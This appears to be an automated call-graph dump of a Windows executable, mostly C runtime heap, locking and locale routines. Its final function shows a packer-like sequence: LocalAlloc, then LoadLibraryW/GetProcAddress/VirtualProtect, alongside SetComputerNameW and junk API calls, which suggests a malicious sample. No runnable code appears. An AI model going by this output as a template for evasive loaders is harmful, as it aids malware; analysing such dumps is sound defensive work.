40b03c 8225->8223 8226 405c76 __amsg_exit 66 API calls 8225->8226 8227 40b048 8226->8227 8227->8223 8231 40cb09 8228->8231 8229 40cba2 8233 40cbab 8229->8233 8487 40c6f2 8229->8487 8231->8229 8231->8233 8480 40c642 8231->8480 8233->8214 8491 40af47 LeaveCriticalSection 8234->8491 8236 40989f 8236->8214 8238 40a320 __decode_pointer 6 API calls 8237->8238 8239 40b55a 8238->8239 8239->8214 8254 40a39b TlsGetValue 8240->8254 8243 40a560 SetLastError 8243->8217 8244 40be13 __calloc_crt 64 API calls 8245 40a51e 8244->8245 8245->8243 8246 40a320 __decode_pointer 6 API calls 8245->8246 8247 40a538 8246->8247 8248 40a557 8247->8248 8249 40a53f 8247->8249 8259 407ece 8248->8259 8250 40a40c __mtinit 64 API calls 8249->8250 8252 40a547 GetCurrentThreadId 8250->8252 8252->8243 8253 40a55d 8253->8243 8255 40a3b0 8254->8255 8256 40a3cb 8254->8256 8257 40a320 __decode_pointer 6 API calls 8255->8257 8256->8243 8256->8244 8258 40a3bb TlsSetValue 8257->8258 8258->8256 8260 407eda _puts 8259->8260 8262 40b021 __lock 65 API calls 8260->8262 8266 407f53 _puts __dosmaperr 8260->8266 8271 407f19 8260->8271 8261 407f2e HeapFree 8263 407f40 8261->8263 8261->8266 8267 407ef1 ___sbh_find_block 8262->8267 8264 407d04 _puts 65 API calls 8263->8264 8265 407f45 GetLastError 8264->8265 8265->8266 8266->8253 8268 407f0b 8267->8268 8272 40c32c 8267->8272 8279 407f24 8268->8279 8271->8261 8271->8266 8273 40c36b 8272->8273 8278 40c60d 8272->8278 8274 40c557 VirtualFree 8273->8274 8273->8278 8275 40c5bb 8274->8275 8276 40c5ca VirtualFree HeapFree 8275->8276 8275->8278 8282 407800 8276->8282 8278->8268 8286 40af47 LeaveCriticalSection 8279->8286 8281 407f2b 8281->8271 8283 407818 8282->8283 8284 40783f __VEC_memcpy 8283->8284 8285 407847 8283->8285 8284->8285 8285->8278 8286->8281 8288 40af6a _puts 8287->8288 8289 40af90 8288->8289 8313 4077c7 8288->8313 8298 40afa0 _puts 8289->8298 8359 40bdce 8289->8359 8296 40afc1 8301 40b021 __lock 67 API calls 8296->8301 8297 40afb2 8300 407d04 _puts 67 API calls 8297->8300 8298->8225 8300->8298 8302 40afc8 8301->8302 8303 40afd0 8302->8303 8304 40affc 8302->8304 8306 40b4db ___lock_fhandle InitializeCriticalSectionAndSpinCount 8303->8306 8305 407ece ___convertcp 67 API calls 8304->8305 8308 40afed 8305->8308 8307 40afdb 8306->8307 8307->8308 8309 407ece ___convertcp 67 API calls 8307->8309 8365 40b018 8308->8365 8311 40afe7 8309->8311 8312 407d04 _puts 67 API calls 8311->8312 8312->8308 8368 40c13f 8313->8368 8316 40c13f __set_error_mode 67 API calls 8319 4077db 8316->8319 8317 40761c __NMSG_WRITE 67 API calls 8318 4077f3 8317->8318 8321 40761c __NMSG_WRITE 67 API calls 8318->8321 8319->8317 8320 4077fd 8319->8320 8322 40761c 8320->8322 8321->8320 8323 407630 8322->8323 8324 40c13f __set_error_mode 64 API calls 8323->8324 8355 40778b 8323->8355 8325 407652 8324->8325 8326 407790 GetStdHandle 8325->8326 8328 40c13f __set_error_mode 64 API calls 8325->8328 8327 40779e _strlen 8326->8327 8326->8355 8331 4077b7 WriteFile 8327->8331 8327->8355 8329 407663 8328->8329 8329->8326 8330 407675 8329->8330 8330->8355 8374 407d4d 8330->8374 8331->8355 8334 4076ab GetModuleFileNameA 8336 4076c9 8334->8336 8340 4076ec _strlen 8334->8340 8338 407d4d _strcpy_s 64 API calls 8336->8338 8339 4076d9 8338->8339 8339->8340 8341 407b74 __invoke_watson 10 API calls 8339->8341 8351 40772f 8340->8351 8390 40c08a 8340->8390 8341->8340 8346 407753 8348 40c016 _strcat_s 64 API calls 8346->8348 8347 407b74 __invoke_watson 10 API calls 8347->8346 8349 407767 8348->8349 8352 407b74 __invoke_watson 10 API calls 8349->8352 8354 407778 8349->8354 8350 407b74 __invoke_watson 10 API calls 8350->8351 8399 40c016 8351->8399 8352->8354 8408 40bead 8354->8408 8356 405cca 8355->8356 8446 405c9f GetModuleHandleW 8356->8446 8361 40bdd7 8359->8361 8362 40afab 8361->8362 8363 40bdee Sleep 8361->8363 8449 407e04 8361->8449 8362->8296 8362->8297 8364 40be03 8363->8364 8364->8361 8364->8362 8479 40af47 LeaveCriticalSection 8365->8479 8367 40b01f 8367->8298 8369 40c14e 8368->8369 8370 407d04 _puts 67 API calls 8369->8370 8373 4077ce 8369->8373 8371 40c171 8370->8371 8372 407c9c _puts 6 API calls 8371->8372 8372->8373 8373->8316 8373->8319 8375 407d65 8374->8375 8376 407d5e 8374->8376 8377 407d04 _puts 67 API calls 8375->8377 8376->8375 8381 407d8b 8376->8381 8378 407d6a 8377->8378 8379 407c9c _puts 6 API calls 8378->8379 8380 407697 8379->8380 8380->8334 8383 407b74 8380->8383 8381->8380 8382 407d04 _puts 67 API calls 8381->8382 8382->8378 8435 407390 8383->8435 8385 407ba1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8386 407c7d GetCurrentProcess TerminateProcess 8385->8386 8388 407c71 __invoke_watson 8385->8388 8437 40667b 8386->8437 8388->8386 8389 4076a8 8389->8334 8395 40c09c 8390->8395 8391 40c0a0 8392 40771c 8391->8392 8393 407d04 _puts 67 API calls 8391->8393 8392->8350 8392->8351 8394 40c0bc 8393->8394 8396 407c9c _puts 6 API calls 8394->8396 8395->8391 8395->8392 8397 40c0e6 8395->8397 8396->8392 8397->8392 8398 407d04 _puts 67 API calls 8397->8398 8398->8394 8400 40c02e 8399->8400 8402 40c027 8399->8402 8401 407d04 _puts 67 API calls 8400->8401 8407 40c033 8401->8407 8402->8400 8405 40c062 8402->8405 8403 407c9c _puts 6 API calls 8404 407742 8403->8404 8404->8346 8404->8347 8405->8404 8406 407d04 _puts 67 API calls 8405->8406 8406->8407 8407->8403 8409 40a317 _doexit 6 API calls 8408->8409 8410 40bebd 8409->8410 8411 40bed0 LoadLibraryA 8410->8411 8412 40bf58 8410->8412 8413 40bee5 GetProcAddress 8411->8413 8414 40bffa 8411->8414 8419 40a320 __decode_pointer 6 API calls 8412->8419 8430 40bf82 8412->8430 8413->8414 8416 40befb 8413->8416 8414->8355 8415 40bfad 8417 40a320 __decode_pointer 6 API calls 8415->8417 8420 40a2a5 __encode_pointer 6 API calls 8416->8420 8417->8414 8418 40a320 __decode_pointer 6 API calls 8429 40bfc5 8418->8429 8421 40bf75 8419->8421 8422 40bf01 GetProcAddress 8420->8422 8423 40a320 __decode_pointer 6 API calls 8421->8423 8424 40a2a5 __encode_pointer 6 API calls 8422->8424 8423->8430 8425 40bf16 GetProcAddress 8424->8425 8426 40a2a5 __encode_pointer 6 API calls 8425->8426 8427 40bf2b GetProcAddress 8426->8427 8428 40a2a5 __encode_pointer 6 API calls 8427->8428 8431 40bf40 8428->8431 8429->8415 8432 40a320 __decode_pointer 6 API calls 8429->8432 8430->8415 8430->8418 8431->8412 8433 40bf4a GetProcAddress 8431->8433 8432->8415 8434 40a2a5 __encode_pointer 6 API calls 8433->8434 8434->8412 8436 40739c __VEC_memzero 8435->8436 8436->8385 8438 406683 8437->8438 8439 406685 IsDebuggerPresent 8437->8439 8438->8389 8445 40c2f4 8439->8445 8442 40bc79 SetUnhandledExceptionFilter UnhandledExceptionFilter 8443 40bc96 __invoke_watson 8442->8443 8444 40bc9e GetCurrentProcess TerminateProcess 8442->8444 8443->8444 8444->8389 8445->8442 8447 405cb3 GetProcAddress 8446->8447 8448 405cc3 ExitProcess 8446->8448 8447->8448 8450 407e16 8449->8450 8451 407eb7 8449->8451 8454 407e27 8450->8454 8458 407eaf 8450->8458 8460 407e73 RtlAllocateHeap 8450->8460 8462 407ea3 8450->8462 8463 40b54a __calloc_impl 6 API calls 8450->8463 8465 407ea8 8450->8465 8467 407db5 8450->8467 8452 40b54a __calloc_impl 6 API calls 8451->8452 8453 407ebd 8452->8453 8456 407d04 _puts 66 API calls 8453->8456 8454->8450 8455 4077c7 __FF_MSGBANNER 66 API calls 8454->8455 8457 40761c __NMSG_WRITE 66 API calls 8454->8457 8461 405cca _doexit 3 API calls 8454->8461 8455->8454 8456->8458 8457->8454 8458->8361 8460->8450 8461->8454 8464 407d04 _puts 66 API calls 8462->8464 8463->8450 8464->8465 8466 407d04 _puts 66 API calls 8465->8466 8466->8458 8468 407dc1 _puts 8467->8468 8469 407df2 _puts 8468->8469 8470 40b021 __lock 67 API calls 8468->8470 8469->8450 8471 407dd7 8470->8471 8472 40cadb ___sbh_alloc_block 5 API calls 8471->8472 8473 407de2 8472->8473 8475 407dfb 8473->8475 8478 40af47 LeaveCriticalSection 8475->8478 8477 407e02 8477->8469 8478->8477 8479->8367 8481 40c655 HeapReAlloc 8480->8481 8482 40c689 HeapAlloc 8480->8482 8483 40c673 8481->8483 8484 40c677 8481->8484 8482->8483 8485 40c6ac VirtualAlloc 8482->8485 8483->8229 8484->8482 8485->8483 8486 40c6c6 HeapFree 8485->8486 8486->8483 8488 40c709 VirtualAlloc 8487->8488 8490 40c750 8488->8490 8490->8233 8491->8236 8492->8164 8511 40af47 LeaveCriticalSection 8493->8511 8495 40a4a3 8495->8174 8497 40efc5 InterlockedIncrement 8496->8497 8498 40efc8 8496->8498 8497->8498 8499 40efd2 InterlockedIncrement 8498->8499 8500 40efd5 8498->8500 8499->8500 8501 40efe2 8500->8501 8502 40efdf InterlockedIncrement 8500->8502 8503 40efec InterlockedIncrement 8501->8503 8505 40efef 8501->8505 8502->8501 8503->8505 8504 40f008 InterlockedIncrement 8504->8505 8505->8504 8506 40f023 InterlockedIncrement 8505->8506 8507 40f018 InterlockedIncrement 8505->8507 8506->8177 8507->8505 8512 40af47 LeaveCriticalSection 8508->8512 8510 40a4f1 8510->8179 8511->8495 8512->8510 8513->8004 8516 40b71e 8514->8516 8518 40b78b 8516->8518 8524 40f76c 8516->8524 8517 40b889 8517->8048 8517->8050 8518->8517 8519 40f76c 77 API calls _parse_cmdline 8518->8519 8519->8518 8521 40ee49 8520->8521 8522 40ee50 8520->8522 8746 40eca6 8521->8746 8522->8043 8527 40f719 8524->8527 8530 4098ba 8527->8530 8531 4098cd 8530->8531 8534 40991a 8530->8534 8538 40a56c 8531->8538 8533 4098fa 8533->8534 8558 40e9a1 8533->8558 8534->8516 8539 40a4f3 __getptd_noexit 67 API calls 8538->8539 8540 40a574 8539->8540 8541 4098d2 8540->8541 8542 405c76 __amsg_exit 67 API calls 8540->8542 8541->8533 8543 40f10d 8541->8543 8542->8541 8544 40f119 _puts 8543->8544 8545 40a56c __getptd 67 API calls 8544->8545 8546 40f11e 8545->8546 8547 40f14c 8546->8547 8549 40f130 8546->8549 8548 40b021 __lock 67 API calls 8547->8548 8550 40f153 8548->8550 8551 40a56c __getptd 67 API calls 8549->8551 8574 40f0cf 8550->8574 8553 40f135 8551->8553 8556 40f143 _puts 8553->8556 8557 405c76 __amsg_exit 67 API calls 8553->8557 8556->8533 8557->8556 8559 40e9ad _puts 8558->8559 8560 40a56c __getptd 67 API calls 8559->8560 8561 40e9b2 8560->8561 8562 40b021 __lock 67 API calls 8561->8562 8563 40e9c4 8561->8563 8564 40e9e2 8562->8564 8566 40e9d2 _puts 8563->8566 8570 405c76 __amsg_exit 67 API calls 8563->8570 8565 40ea2b 8564->8565 8567 40ea13 InterlockedIncrement 8564->8567 8568 40e9f9 InterlockedDecrement 8564->8568 8742 40ea3c 8565->8742 8566->8534 8567->8565 8568->8567 8571 40ea04 8568->8571 8570->8566 8571->8567 8572 407ece ___convertcp 67 API calls 8571->8572 8573 40ea12 8572->8573 8573->8567 8575 40f0d3 8574->8575 8576 40f105 8574->8576 8575->8576 8577 40efa7 ___addlocaleref 8 API calls 8575->8577 8582 40f177 8576->8582 8578 40f0e6 8577->8578 8578->8576 8585 40f036 8578->8585 8741 40af47 LeaveCriticalSection 8582->8741 8584 40f17e 8584->8553 8586 40f047 InterlockedDecrement 8585->8586 8587 40f0ca 8585->8587 8588 40f05c InterlockedDecrement 8586->8588 8589 40f05f 8586->8589 8587->8576 8599 40ee5e 8587->8599 8588->8589 8590 40f069 InterlockedDecrement 8589->8590 8591 40f06c 8589->8591 8590->8591 8592 40f076 InterlockedDecrement 8591->8592 8593 40f079 8591->8593 8592->8593 8594 40f083 InterlockedDecrement 8593->8594 8595 40f086 8593->8595 8594->8595 8596 40f09f InterlockedDecrement 8595->8596 8597 40f0af InterlockedDecrement 8595->8597 8598 40f0ba InterlockedDecrement 8595->8598 8596->8595 8597->8595 8598->8587 8600 40eee2 8599->8600 8602 40ee75 8599->8602 8601 40ef2f 8600->8601 8603 407ece ___convertcp 67 API calls 8600->8603 8621 40ef56 8601->8621 8653 410971 8601->8653 8602->8600 8605 40eea9 8602->8605 8611 407ece ___convertcp 67 API calls 8602->8611 8606 40ef03 8603->8606 8608 40eeca 8605->8608 8618 407ece ___convertcp 67 API calls 8605->8618 8609 407ece ___convertcp 67 API calls 8606->8609 8614 407ece ___convertcp 67 API calls 8608->8614 8613 40ef16 8609->8613 8610 407ece ___convertcp 67 API calls 8610->8621 8616 40ee9e 8611->8616 8612 40ef9b 8617 407ece ___convertcp 67 API calls 8612->8617 8619 407ece ___convertcp 67 API calls 8613->8619 8615 40eed7 8614->8615 8622 407ece ___convertcp 67 API calls 8615->8622 8629 410b4b 8616->8629 8624 40efa1 8617->8624 8625 40eebf 8618->8625 8626 40ef24 8619->8626 8620 407ece 67 API calls ___convertcp 8620->8621 8621->8612 8621->8620 8622->8600 8624->8576 8645 410b06 8625->8645 8628 407ece ___convertcp 67 API calls 8626->8628 8628->8601 8630 410b58 8629->8630 8644 410bd5 8629->8644 8631 410b69 8630->8631 8633 407ece ___convertcp 67 API calls 8630->8633 8632 410b7b 8631->8632 8634 407ece ___convertcp 67 API calls 8631->8634 8635 410b8d 8632->8635 8636 407ece ___convertcp 67 API calls 8632->8636 8633->8631 8634->8632 8637 410b9f 8635->8637 8638 407ece ___convertcp 67 API calls 8635->8638 8636->8635 8639 407ece ___convertcp 67 API calls 8637->8639 8640 410bb1 8637->8640 8638->8637 8639->8640 8641 407ece ___convertcp 67 API calls 8640->8641 8642 410bc3 8640->8642 8641->8642 8643 407ece ___convertcp 67 API calls 8642->8643 8642->8644 8643->8644 8644->8605 8646 410b13 8645->8646 8652 410b47 8645->8652 8647 407ece ___convertcp 67 API calls 8646->8647 8649 410b23 8646->8649 8647->8649 8648 410b35 8651 407ece ___convertcp 67 API calls 8648->8651 8648->8652 8649->8648 8650 407ece ___convertcp 67 API calls 8649->8650 8650->8648 8651->8652 8652->8608 8654 40ef4f 8653->8654 8655 410982 8653->8655 8654->8610 8656 407ece ___convertcp 67 API calls 8655->8656 8657 41098a 8656->8657 8658 407ece ___convertcp 67 API calls 8657->8658 8659 410992 8658->8659 8660 407ece ___convertcp 67 API calls 8659->8660 8661 41099a 8660->8661 8662 407ece ___convertcp 67 API calls 8661->8662 8663 4109a2 8662->8663 8664 407ece ___convertcp 67 API calls 8663->8664 8665 4109aa 8664->8665 8666 407ece ___convertcp 67 API calls 8665->8666 8667 4109b2 8666->8667 8668 407ece ___convertcp 67 API calls 8667->8668 8669 4109b9 8668->8669 8670 407ece ___convertcp 67 API calls 8669->8670 8671 4109c1 8670->8671 8672 407ece ___convertcp 67 API calls 8671->8672 8673 4109c9 8672->8673 8674 407ece ___convertcp 67 API calls 8673->8674 8675 4109d1 8674->8675 8676 407ece ___convertcp 67 API calls 8675->8676 8677 4109d9 8676->8677 8678 407ece ___convertcp 67 API calls 8677->8678 8679 4109e1 8678->8679 8680 407ece ___convertcp 67 API calls 8679->8680 8681 4109e9 8680->8681 8682 407ece ___convertcp 67 API calls 8681->8682 8683 4109f1 8682->8683 8684 407ece ___convertcp 67 API calls 8683->8684 8685 4109f9 8684->8685 8686 407ece ___convertcp 67 API calls 8685->8686 8687 410a01 8686->8687 8688 407ece ___convertcp 67 API calls 8687->8688 8689 410a0c 8688->8689 8690 407ece ___convertcp 67 API calls 8689->8690 8691 410a14 8690->8691 8692 407ece ___convertcp 67 API calls 8691->8692 8693 410a1c 8692->8693 8694 407ece ___convertcp 67 API calls 8693->8694 8695 410a24 8694->8695 8696 407ece ___convertcp 67 API calls 8695->8696 8697 410a2c 8696->8697 8698 407ece ___convertcp 67 API calls 8697->8698 8699 410a34 8698->8699 8700 407ece ___convertcp 67 API calls 8699->8700 8701 410a3c 8700->8701 8702 407ece ___convertcp 67 API calls 8701->8702 8703 410a44 8702->8703 8704 407ece ___convertcp 67 API calls 8703->8704 8705 410a4c 8704->8705 8706 407ece ___convertcp 67 API calls 8705->8706 8707 410a54 8706->8707 8708 407ece ___convertcp 67 API calls 8707->8708 8709 410a5c 8708->8709 8710 407ece ___convertcp 67 API calls 8709->8710 8711 410a64 8710->8711 8712 407ece ___convertcp 67 API calls 8711->8712 8713 410a6c 8712->8713 8714 407ece ___convertcp 67 API calls 8713->8714 8715 410a74 8714->8715 8716 407ece ___convertcp 67 API calls 8715->8716 8717 410a7c 8716->8717 8718 407ece ___convertcp 67 API calls 8717->8718 8719 410a84 8718->8719 8720 407ece ___convertcp 67 API calls 8719->8720 8721 410a92 8720->8721 8722 407ece ___convertcp 67 API calls 8721->8722 8723 410a9d 8722->8723 8724 407ece ___convertcp 67 API calls 8723->8724 8725 410aa8 8724->8725 8726 407ece ___convertcp 67 API calls 8725->8726 8727 410ab3 8726->8727 8728 407ece ___convertcp 67 API calls 8727->8728 8729 410abe 8728->8729 8730 407ece ___convertcp 67 API calls 8729->8730 8731 410ac9 8730->8731 8732 407ece ___convertcp 67 API calls 8731->8732 8733 410ad4 8732->8733 8734 407ece ___convertcp 67 API calls 8733->8734 8735 410adf 8734->8735 8736 407ece ___convertcp 67 API calls 8735->8736 8737 410aea 8736->8737 8738 407ece ___convertcp 67 API calls 8737->8738 8739 410af5 8738->8739 8740 407ece ___convertcp 67 API calls 8739->8740 8740->8654 8741->8584 8745 40af47 LeaveCriticalSection 8742->8745 8744 40ea43 8744->8563 8745->8744 8747 40ecb2 _puts 8746->8747 8748 40a56c __getptd 67 API calls 8747->8748 8749 40ecbb 8748->8749 8750 40e9a1 __setmbcp 69 API calls 8749->8750 8751 40ecc5 8750->8751 8777 40ea45 8751->8777 8754 40bdce __malloc_crt 67 API calls 8755 40ece6 8754->8755 8756 40ee05 _puts 8755->8756 8784 40eac1 8755->8784 8756->8522 8759 40ed16 InterlockedDecrement 8761 40ed26 8759->8761 8762 40ed37 InterlockedIncrement 8759->8762 8760 40ee12 8760->8756 8764 40ee25 8760->8764 8766 407ece ___convertcp 67 API calls 8760->8766 8761->8762 8765 407ece ___convertcp 67 API calls 8761->8765 8762->8756 8763 40ed4d 8762->8763 8763->8756 8769 40b021 __lock 67 API calls 8763->8769 8767 407d04 _puts 67 API calls 8764->8767 8768 40ed36 8765->8768 8766->8764 8767->8756 8768->8762 8771 40ed61 InterlockedDecrement 8769->8771 8772 40edf0 InterlockedIncrement 8771->8772 8773 40eddd 8771->8773 8794 40ee07 8772->8794 8773->8772 8775 407ece ___convertcp 67 API calls 8773->8775 8776 40edef 8775->8776 8776->8772 8778 4098ba _LocaleUpdate::_LocaleUpdate 77 API calls 8777->8778 8779 40ea59 8778->8779 8780 40ea82 8779->8780 8781 40ea64 GetOEMCP 8779->8781 8782 40ea87 GetACP 8780->8782 8783 40ea74 8780->8783 8781->8783 8782->8783 8783->8754 8783->8756 8785 40ea45 getSystemCP 79 API calls 8784->8785 8786 40eae1 8785->8786 8787 40eaec setSBCS 8786->8787 8790 40eb30 IsValidCodePage 8786->8790 8793 40eb55 _memset __setmbcp_nolock 8786->8793 8788 40667b _$I10_OUTPUT 5 API calls 8787->8788 8789 40eca4 8788->8789 8789->8759 8789->8760 8790->8787 8791 40eb42 GetCPInfo 8790->8791 8791->8787 8791->8793 8797 40e80e GetCPInfo 8793->8797 8930 40af47 LeaveCriticalSection 8794->8930 8796 40ee0e 8796->8756 8798 40e8f4 8797->8798 8800 40e842 _memset 8797->8800 8802 40667b _$I10_OUTPUT 5 API calls 8798->8802 8807 41092f 8800->8807 8804 40e99f 8802->8804 8804->8793 8806 410730 ___crtLCMapStringA 102 API calls 8806->8798 8808 4098ba _LocaleUpdate::_LocaleUpdate 77 API calls 8807->8808 8809 410942 8808->8809 8817 410775 8809->8817 8812 410730 8813 4098ba _LocaleUpdate::_LocaleUpdate 77 API calls 8812->8813 8814 410743 8813->8814 8883 41038b 8814->8883 8818 410796 GetStringTypeW 8817->8818 8822 4107c1 8817->8822 8819 4107b6 GetLastError 8818->8819 8821 4107ae 8818->8821 8819->8822 8820 4108a8 8845 412bc9 GetLocaleInfoA 8820->8845 8823 4107fa MultiByteToWideChar 8821->8823 8840 4108a2 8821->8840 8822->8820 8822->8821 8828 410827 8823->8828 8823->8840 8825 40667b _$I10_OUTPUT 5 API calls 8827 40e8af 8825->8827 8827->8812 8831 41083c _memset ___convertcp 8828->8831 8832 407e04 _malloc 67 API calls 8828->8832 8829 4108f9 GetStringTypeA 8830 410914 8829->8830 8829->8840 8835 407ece ___convertcp 67 API calls 8830->8835 8834 410875 MultiByteToWideChar 8831->8834 8831->8840 8832->8831 8837 41088b GetStringTypeW 8834->8837 8838 41089c 8834->8838 8835->8840 8837->8838 8841 40f6f9 8838->8841 8840->8825 8842 40f705 8841->8842 8843 40f716 8841->8843 8842->8843 8844 407ece ___convertcp 67 API calls 8842->8844 8843->8840 8844->8843 8846 412bf7 8845->8846 8847 412bfc 8845->8847 8849 40667b _$I10_OUTPUT 5 API calls 8846->8849 8876 405701 8847->8876 8850 4108cc 8849->8850 8850->8829 8850->8840 8851 412c12 8850->8851 8852 412cdc 8851->8852 8853 412c52 GetCPInfo 8851->8853 8856 40667b _$I10_OUTPUT 5 API calls 8852->8856 8854 412cc7 MultiByteToWideChar 8853->8854 8855 412c69 8853->8855 8854->8852 8860 412c82 _strlen 8854->8860 8855->8854 8857 412c6f GetCPInfo 8855->8857 8858 4108ed 8856->8858 8857->8854 8859 412c7c 8857->8859 8858->8829 8858->8840 8859->8854 8859->8860 8861 407e04 _malloc 67 API calls 8860->8861 8863 412cb4 _memset ___convertcp 8860->8863 8861->8863 8862 412d11 MultiByteToWideChar 8864 412d29 8862->8864 8865 412d48 8862->8865 8863->8852 8863->8862 8867 412d30 WideCharToMultiByte 8864->8867 8868 412d4d 8864->8868 8866 40f6f9 __freea 67 API calls 8865->8866 8866->8852 8867->8865 8869 412d58 WideCharToMultiByte 8868->8869 8870 412d6c 8868->8870 8869->8865 8869->8870 8871 40be13 __calloc_crt 67 API calls 8870->8871 8872 412d74 8871->8872 8872->8865 8873 412d7d WideCharToMultiByte 8872->8873 8873->8865 8874 412d8f 8873->8874 8875 407ece ___convertcp 67 API calls 8874->8875 8875->8865 8879 409b70 8876->8879 8880 409b89 8879->8880 8881 409941 strtoxl 91 API calls 8880->8881 8882 405712 8881->8882 8882->8846 8884 4103ac LCMapStringW 8883->8884 8887 4103c7 8883->8887 8885 4103cf GetLastError 8884->8885 8884->8887 8885->8887 8886 4105c5 8889 412bc9 ___ansicp 91 API calls 8886->8889 8887->8886 8888 410421 8887->8888 8890 41043a MultiByteToWideChar 8888->8890 8913 4105bc 8888->8913 8892 4105ed 8889->8892 8897 410467 8890->8897 8890->8913 8891 40667b _$I10_OUTPUT 5 API calls 8893 40e8cf 8891->8893 8894 4106e1 LCMapStringA 8892->8894 8895 410606 8892->8895 8892->8913 8893->8806 8908 41063d 8894->8908 8898 412c12 ___convertcp 74 API calls 8895->8898 8896 410480 ___convertcp 8899 4104b8 MultiByteToWideChar 8896->8899 8896->8913 8897->8896 8901 407e04 _malloc 67 API calls 8897->8901 8902 410618 8898->8902 8900 4104d1 LCMapStringW 8899->8900 8925 4105b3 8899->8925 8903 4104f2 8900->8903 8900->8925 8901->8896 8905 410622 LCMapStringA 8902->8905 8902->8913 8909 4104fb 8903->8909 8910 410524 8903->8910 8904 407ece ___convertcp 67 API calls 8907 410708 8904->8907 8905->8908 8915 410644 8905->8915 8906 40f6f9 __freea 67 API calls 8906->8913 8911 407ece ___convertcp 67 API calls 8907->8911 8907->8913 8908->8904 8908->8907 8912 41050d LCMapStringW 8909->8912 8909->8925 8920 41053f ___convertcp 8910->8920 8921 407e04 _malloc 67 API calls 8910->8921 8911->8913 8912->8925 8913->8891 8914 410573 LCMapStringW 8917 41058b WideCharToMultiByte 8914->8917 8918 4105ad 8914->8918 8916 410655 _memset ___convertcp 8915->8916 8919 407e04 _malloc 67 API calls 8915->8919 8916->8908 8923 410693 LCMapStringA 8916->8923 8917->8918 8922 40f6f9 __freea 67 API calls 8918->8922 8919->8916 8920->8914 8920->8925 8921->8920 8922->8925 8926 4106b3 8923->8926 8927 4106af 8923->8927 8925->8906 8928 412c12 ___convertcp 74 API calls 8926->8928 8929 40f6f9 __freea 67 API calls 8927->8929 8928->8927 8929->8908 8930->8796 8932 40b1e4 8931->8932 8933 40a2a5 __encode_pointer 6 API calls 8932->8933 8934 40b1fc 8932->8934 8933->8932 8934->8071 8938 40b13f 8935->8938 8937 40b188 8937->8073 8939 40b14b _puts 8938->8939 8946 405ce2 8939->8946 8945 40b16c _puts 8945->8937 8947 40b021 __lock 67 API calls 8946->8947 8948 405ce9 8947->8948 8949 40b054 8948->8949 8950 40a320 __decode_pointer 6 API calls 8949->8950 8951 40b068 8950->8951 8952 40a320 __decode_pointer 6 API calls 8951->8952 8953 40b078 8952->8953 8954 40b0fb 8953->8954 8969 40f5ce 8953->8969 8966 40b175 8954->8966 8956 40a2a5 __encode_pointer 6 API calls 8957 40b0f0 8956->8957 8960 40a2a5 __encode_pointer 6 API calls 8957->8960 8958 40b0ba 8958->8954 8962 40be5f __realloc_crt 73 API calls 8958->8962 8963 40b0d0 8958->8963 8959 40b096 8959->8958 8965 40b0e2 8959->8965 8982 40be5f 8959->8982 8960->8954 8962->8963 8963->8954 8964 40a2a5 __encode_pointer 6 API calls 8963->8964 8964->8965 8965->8956 9031 405ceb 8966->9031 8970 40f5da _puts 8969->8970 8971 40f607 8970->8971 8972 40f5ea 8970->8972 8974 40f648 HeapSize 8971->8974 8976 40b021 __lock 67 API calls 8971->8976 8973 407d04 _puts 67 API calls 8972->8973 8975 40f5ef 8973->8975 8977 40f5ff _puts 8974->8977 8978 407c9c _puts 6 API calls 8975->8978 8979 40f617 ___sbh_find_block 8976->8979 8977->8959 8978->8977 8987 40f668 8979->8987 8983 40be68 8982->8983 8985 40bea7 8983->8985 8986 40be88 Sleep 8983->8986 8991 40f8bb 8983->8991 8985->8958 8986->8983 8990 40af47 LeaveCriticalSection 8987->8990 8989 40f643 8989->8974 8989->8977 8990->8989 8992 40f8c7 _puts 8991->8992 8993 40f8dc 8992->8993 8994 40f8ce 8992->8994 8995 40f8e3 8993->8995 8996 40f8ef 8993->8996 8997 407e04 _malloc 67 API calls 8994->8997 8998 407ece ___convertcp 67 API calls 8995->8998 9003 40fa61 8996->9003 9019 40f8fc ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 8996->9019 9017 40f8d6 _puts __dosmaperr 8997->9017 8998->9017 8999 40fa94 9001 40b54a __calloc_impl 6 API calls 8999->9001 9000 40fa66 HeapReAlloc 9000->9003 9000->9017 9004 40fa9a 9001->9004 9002 40b021 __lock 67 API calls 9002->9019 9003->8999 9003->9000 9005 40fab8 9003->9005 9007 40b54a __calloc_impl 6 API calls 9003->9007 9009 40faae 9003->9009 9006 407d04 _puts 67 API calls 9004->9006 9008 407d04 _puts 67 API calls 9005->9008 9005->9017 9006->9017 9007->9003 9010 40fac1 GetLastError 9008->9010 9012 407d04 _puts 67 API calls 9009->9012 9010->9017 9025 40fa2f 9012->9025 9013 40f987 HeapAlloc 9013->9019 9014 40fa34 GetLastError 9014->9017 9015 40f9dc HeapReAlloc 9015->9019 9016 40cadb ___sbh_alloc_block 5 API calls 9016->9019 9017->8983 9018 40fa47 9018->9017 9021 407d04 _puts 67 API calls 9018->9021 9019->8999 9019->9002 9019->9013 9019->9015 9019->9016 9019->9017 9019->9018 9020 40b54a __calloc_impl 6 API calls 9019->9020 9022 40fa2a 9019->9022 9026 40c32c __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 9019->9026 9027 40f9ff 9019->9027 9020->9019 9023 40fa54 9021->9023 9024 407d04 _puts 67 API calls 9022->9024 9023->9010 9023->9017 9024->9025 9025->9014 9025->9017 9026->9019 9030 40af47 LeaveCriticalSection 9027->9030 9029 40fa06 9029->9019 9030->9029 9034 40af47 LeaveCriticalSection 9031->9034 9033 405cf2 9033->8945 9034->9033 9036 4041ca __EH_prolog __write_nolock 9035->9036 9037 404243 LocalAlloc 9036->9037 9038 4041e5 SetLocalTime 9036->9038 9121 40410b LoadLibraryW GetProcAddress VirtualProtect 9037->9121 9127 4044e9 9038->9127 9042 404264 9044 40426c SetLastError GetLastError GetCurrentProcessId 9042->9044 9046 40428c 9042->9046 9044->9042 9044->9046 9045 4041fd 9146 403cd0 9045->9146 9047 4042c7 9046->9047 9048 4042b7 SetComputerNameW 9046->9048 9049 4042d5 GetConsoleAliasA GetNumberFormatW FindResourceW GetConsoleAliasesA 9047->9049 9051 404316 9047->9051 9048->9046 9049->9047 9122 404004 9051->9122 9056 40431d GetLastError 9059 40431b 9056->9059 9059->9056 9060 404332 9059->9060 9063 404341 EndUpdateResourceA GetComputerNameA GetSystemWindowsDirectoryA GetWindowsDirectoryW 9060->9063 9066 40437f GetConsoleProcessList 9060->9066 9067 40438a LoadLibraryW 9060->9067 9061 405701 ___ansicp 91 API calls 9062 404225 9061->9062 9157 405021 9062->9157 